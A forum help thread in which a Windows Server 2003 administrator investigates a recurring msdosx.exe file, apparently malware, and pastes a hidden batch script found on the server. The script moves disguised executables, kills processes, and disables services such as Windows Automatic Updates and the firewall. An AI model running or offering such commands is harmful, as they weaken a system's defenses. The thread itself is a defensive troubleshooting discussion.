asked on

msdosx.exe

Keep finding msdosx.exe on c:\ from an Win2k3 server. AV, Spyware software does not find any problems.

Does anyone know what this is?

fuzzymallets1

Here's what I found so far

http://www.greatis.com/appdata/d/m/msdos.exe.htm

fuzzymallets1

oops wrong link ..

Here you go

http://help.lockergnome.com/windows/ID-file--ftopict213048.html

zombie99

ASKER

Same thing I have found. But if you delete it after rebooting it comes back.

fuzzymallets1

Then try using different Anti virus and spyware. What all have you used?

zombie99

ASKER

I got Mcafee Groupshield (it happens to be an Exchange server..) with the latest update & SuperAnti Spyware... in the past these have worked for me.

I appreciate the help

fuzzymallets1

Try some of the free ones like AVG or spybot.

AVG

http://free.avg.com/download-avg-anti-virus-free-edition

Spybot

http://www.safer-networking.org/en/download/index.html

zombie99

ASKER

Ok, after doing some research... I found under the \windows\temp folder a hiden file called bt3388.bat, that creates a mess on the windows\system and system32 folders.

Also, apparently this "virus" is new since there was no information prior to 02/13/09.

This is the script on the file:

cd %windir%\fix
attrib -s -h %windir%\system32\lssas.exe
attrib -s -h %windir%\system32\spooIsv.exe
attrib -s -h %windir%\system32\csrs.exe
attrib -s -h %windir%\system\smsc32.exe
attrib -s -h %windir%\system32\msddns.exe
attrib -s -h %windir%\system32\Isass.exe
attrib -s -h %windir%\system32\winIogon.exe
attrib -s -h %windir%\system32\regsvr.exe
attrib -s -h %windir%\usbservice.exe
attrib -s -h %windir%\FireFoxUpdater.exe
attrib -s -h %windir%\TSM7GN.exe
attrib -s -h %windir%\part2p.exe
attrib -s -h %windir%\system32\sysmgr.exe
attrib -s -h %windir%\system32\spoolsvc.exe
attrib -s -h %windir%\system32\no.exe.exe
attrib -s -h %windir%\system32\csrmgr.exe
attrib -s -h %windir%\system32\csrms.exe
attrib -s -h %windir%\system32\wgareg.exe
attrib -s -h %windir%\part1p.exe
attrib -s -h %windir%\sithhqp.exe
attrib -s -h C:\msisrv.exe
attrib -s -h %windir%\system32\msr.exe
attrib -s -h %windir%\security\svchost.exe
attrib -s -h %windir%\system\wuauclt.exe
attrib -s -h %windir%\system\msddll.exe
attrib -s -h %windir%\system\svhost.exe
attrib -s -h %windir%\system\vmwareservice.exe
attrib -s -h %windir%\lsass.exe
attrib -s -h %windir%\system32\service.exe
attrib -s -h C:\skp.exe
attrib -s -h %windir%\system32\wins\wmsncs.exe
attrib -s -h %windir%\system32\hgcheck.exe
attrib -s -h %windir%\system32\afisicx.exe
attrib -s -h %windir%\fonts\wmsncs.exe
attrib -s -h C:\recycler\tesktas.exe
attrib -s -h %windir%\system32\noytcyr.exe
attrib -s -h %windir%\system32\roytctm.exe
attrib -s -h %windir%\system32\soxpeca.exe
attrib -s -h %windir%\system32\tdydowkc.exe
attrib -s -h %windir%\system32\wsldoekd.exe
attrib -s -h %windir%\system32\udxfytw.sys
attrib -s -h %windir%\system32\msservice.exe
attrib -s -h %windir%\system32\csrsc.exe
attrib -s -h %windir%\system32\wscntfysvc.exe
attrib -s -h %windir%\system32\msnco.exe
move %windir%\system32\lssas.exe %windir%\temp\%random%
move %windir%\system32\spooIsv.exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.exe %windir%\temp\%random%
move %windir%\system32\winIogon.exe %windir%\temp\%random%
pv -kf Isass.exe
pv -kf winIogon.exe
pv -kf lssas.exe
pv -kf spooIsv.exe
move %windir%\system32\lssas.exe %windir%\temp\%random%
move %windir%\system32\spooIsv.exe %windir%\temp\%random%
move %windir%\system32\csrs.exe %windir%\temp\%random%
move %windir%\system32\Isass.exe %windir%\temp\%random%
move %windir%\system32\winIogon.exe %windir%\temp\%random%
move %windir%\system32\msddns.exe %windir%\temp\%random%
move %windir%\system32\regsvr.exe %windir%\temp\%random%
move %windir%\smsc32.exe %windir%\temp\%random%
move %windir%\usbservice.exe %windir%\temp\%random%
move %windir%\FireFoxUpdater.exe %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
move %windir%\system\wuauclt.exe %windir%\temp\%random%
move %windir%\system32\csrsc.exe %windir%\temp\%random%
move %windir%\system32\wscntfysvc.exe %windir%\temp\%random%
move %windir%\system32\msnco.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
move %windir%\system32\wgareg.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\spoolsvc.exe %windir%\temp\%random%
move %windir%\system32\no.exe.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\tpszxyd.sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\mabidwe.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\system32\msddns.exe %windir%\temp\%random%
pv -kf msddns.exe
move %windir%\system32\msddns.exe %windir%\temp\%random%
move %windir%\svchost.exe %windir%\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf tsnp2std.exe
pv -kf fixcamera.exe
move %windir%\tsnp2std.exe %windir%\%random%
move %windir%\svchost.exe %windir%\%random%
pv -kf FireFoxUpdater.exe
pv kf TSM7GN.exe
move %windir%\FireFoxUpdater.exe %windir%\temp\%random%
move %windir%\TSM7GN.exe %windir%\temp\%random%
move %windir%\fixcamera.exe %windir%\%random%
pv -kf wuauclt.exe
move %windir%\system\wuauclt.exe %windir%\temp\%random%
pv -kf wgareg.exe
pv -kf msservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf usbservice.exe
move %windir%\usbservice.exe %windir%\temp\%random%
pv -kf *.sys
pv -kf csrmgr.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf smsc32.exe
move %windir%\smsc32.exe %windir%\temp\%random%
pv -kf csrms.exe
pv -kf spoolsvc.exe
pv -kf sysmgr.exe
move %windir%\system32\regsvr.exe %windir%\temp\%random%
pv -kf regsvr.exe
move %windir%\system32\regsvr.exe %windir%\temp\%random%
pv -kf wscntfy.exe
pv -kf no.exe.exe
pv -kf sysmgr.exe
pv -kf afisicx.exe
pv -kf noytcyr.exe
pv -kf wsldoekd.exe
pv -kf roytctm.exe
pv -kf tdydowkc.exe
pv -kf mabidwe.exe
pv -kf soxpeca.exe
pv -kf rundll*
pv -kf ntv*
pv -kf dww*
pv -kf ping*
pv -kf task*
pv -kf csrsc.exe
pv -kf wscntfysvc.exe
pv -kf msnco.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\fonts\wmsncs.exe %windir%\temp\%random%
cls
move %windir%\system32\csrsc.exe %windir%\temp\%random%
move %windir%\system32\wscntfysvc.exe %windir%\temp\%random%
move %windir%\system32\msnco.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
move %windir%\system32\wgareg.exe %windir%\temp\%random%
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\spoolsvc.exe %windir%\temp\%random%
move %windir%\system32\no.exe.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\tpszxyd.sys %windir%\temp\%random%
move %windir%\system32\java.exe %windir%\temp\%random%
cls
move %windir%\system32\sysmgr.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\mabidwe.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\msservice.exe %windir%\temp\%random%
attrib -s -h %windir%\temp\csrssc.exe
attrib -s -h %windir%\winlogon.exe
pv -kf csrssc.exe
move %windir%\temp\csrssc.exe
move %windir%\winlogon.exe
cls
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
move %windir%\lsass.exe %windir%\temp\%random%
move %windir%\system32\service.exe %windir%\temp\%random%
move C:\skp.exe %windir%\temp\%random%
cls
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
cls
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
pv -kf udxfytw.sys
move %windir%\system32\udxfytw.sys %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
pv -kf wmsncs.exe
move %windir%\system32\wins\wmsncs.exe %windir%\temp\%random%
move %windir%\system32\service.exe %windir%\temp\%random%
pv -kf service.exe
move %windir%\system32\service.exe %windir%\temp\%random%
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
pv -kf hgcheck.exe
move %windir%\system32\hgcheck.exe %windir%\temp\%random%
cls
move C:\msisrv.exe %windir%\temp\%random%
pv -kf msisrv.exe
move C:\msisrv.exe %windir%\temp\%random%
move %windir%\system32\msr.exe %windir%\temp\%random%
scx config msrpxy start= disabled
scx delete msrpxy
pv -kf msr.exe
scx config msrpxy start= disabled
scx delete msrpxy
scx config AccessSharing start= disabled
scx config winspoolsvc start= disabled
scx config mscncosd start= disabled
cls
move %windir%\system32\msr.exe %windir%\temp\%random%
move %windir%\security\svchost.exe %windir%\temp\%random%
scx config WinHost32Svr start= disabled
move %windir%\security\svchost.exe %windir%\temp\%random%
move %windir%\system\msddll.exe %windir%\temp\%random%
scx config msddll start= disabled
pv -kf msddll.exe
cls
move %windir%\system\msddll.exe %windir%\temp\%random%
move %windir%\system\svhost.exe %windir%\temp\%random%
scx config "WindowsTelephony" start= disabled
pv -kf svhost.exe
cls
move %windir%\system\svhost.exe %windir%\temp\%random%
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
scx config VmwareService start= disabled
pv -kf vmwareservice.exe
cls
move %windir%\system\vmwareservice.exe %windir%\temp\%random%
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
pv -kf part2p.exe
pv -kf part1p.exe
pv -kf sithhqp.exe
cls
move %windir%\part2p.exe %windir%\temp\%random%
move %windir%\part1p.exe %windir%\temp\%random%
move %windir%\sithhqp.exe %windir%\temp\%random%
scx config afisicx start= disabled
%windir%\system32\afisicx.exe
pv -kf afisicx.exe
scx stop afisicx.exe
scx config HCencerSer start= disabled
C:\recycler\tesktas.exe
pv -kf tesktas.exe
scx stop HcencerSer
scx config noytcyr start= disabled
%windir%\system32\noytcyr.exe
pv -kf noytcyr.exe
scx stop noytcyr
scx config roytctm start= disabled
%windir%\system32\roytctm.exe
pv -kf roytctm.exe
scx stop roytctm.exe
scx config soxpeca start= disabled
cls
%windir%\system32\soxpeca.exe
pv -kf soxpeca.exe
scx stop soxpeca.exe
scx config tdydowkc start= disabled
%windir%\system32\tdydowkc.exe
pv -kf tdydowkc.exe
scx stop tdydwokc
scx config wsldoekd start= disabled
%windir%\system32\wsldoekd.exe
pv -kf wsldoekd.exe
scx config "Usb Service 2.0" start= disabled
pv -kf usbservice.exe
scx config ypadky start= disabled
scx stop ypadky
scx stop wsldoekd
scx config Wxsynas start= disabled
scx stop Wxsynas
scx stop dnshost
scx config dnshost start= disabled
scx config winhost32svr start= disabled
scx config netstats start= disabled
scx stop ICF
cls
scx config "Windows automatic updates" start= disabled
pv -kf wuauclt.exe
move %windir%\system\wuauclt.exe %windir%\temp\%random%
scx delete ICF
move %windir%\system32\afisicx.exe %windir%\temp\%random%
move C:\recycler\tesktas.exe %windir%\temp\%random%
move %windir%\system32\noytcyr.exe %windir%\temp\%random%
move %windir%\system32\roytctm.exe %windir%\temp\%random%
move %windir%\system32\soxpeca.exe %windir%\temp\%random%
move %windir%\system32\tdydowkc.exe %windir%\temp\%random%
move %windir%\system32\wsldoekd.exe %windir%\temp\%random%
IF EXIST C:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013\cfixer.exe (
pv -kf explor*
cd "c:\recycler\s-1-5-21-1482476501-1644491937-682003330-1013"
move cfixer.exe %windir%\%random%
)

del scx.exe
del pv.exe
cls
del C:\Helios.exe
del C:\msdos.exe
del C:\msdosx.exe
del C:\1.exe
del cln.bat

------------------------------------------------------------------

Any idea on how to reverse all this without re-installing?

Any help is appreciated.

itsupportva

Any ideas yet? I am having the same problem. My system32 folder is filling up with temp*.bk files.

zombie99

ASKER

Ended up deleteing everythng manually. It works now.

ASKER CERTIFIED SOLUTION

zombie99

membership

This solution is only available to members.

To access this solution, you must be a member of Experts Exchange.

Start Free Trial